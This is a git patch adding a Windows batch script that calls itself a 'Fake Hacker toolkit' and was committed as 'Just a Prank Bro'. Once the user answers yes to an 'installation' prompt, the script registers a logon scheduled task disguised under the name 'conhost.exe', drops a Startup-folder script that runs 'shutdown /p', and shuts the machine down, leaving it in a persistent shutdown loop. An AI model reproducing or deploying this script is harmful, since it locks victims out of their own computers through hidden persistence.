From 6c2e76026c0fe6211c171c36d5b5aff523b989b1 Mon Sep 17 00:00:00 2001 From: rafa_99 Date: Thu, 23 Sep 2021 16:40:24 +0100 Subject: Just a Prank Bro --- ShitStain/Thurd/ShitStain_The_Thurd.bat | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 ShitStain/Thurd/ShitStain_The_Thurd.bat (limited to 'ShitStain/Thurd') diff --git a/ShitStain/Thurd/ShitStain_The_Thurd.bat b/ShitStain/Thurd/ShitStain_The_Thurd.bat new file mode 100644 index 0000000..ab8d1ab --- /dev/null +++ b/ShitStain/Thurd/ShitStain_The_Thurd.bat @@ -0,0 +1,31 @@ +::Fake Hacker toolkit that makes a shutdown.bat on startup menu +@echo off +title Hacker Remix +goto choice + +:start +schtasks /create /tn "conhost.exe" /tr %CD%\%0 /sc onlogon +cd /d "%systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" +echo @echo off > lol.bat +echo shutdown /p >>lol.bat +shutdown /p +break + +:choice +color 0f +echo Do you want to begin the Hacker Remix installation?[Y/N] +set input= +set /p input= +if %input%==Y goto start +if %input%==y goto start +if %input%==yes goto start +if %input%==YES goto start +if %input%==Yes goto start +if %input%==N goto end +if %input%==n goto end +if %input%==no goto end +if %input%==NO goto end +if %input%==No goto end + +:end +break \ No newline at end of file -- cgit v1.2.3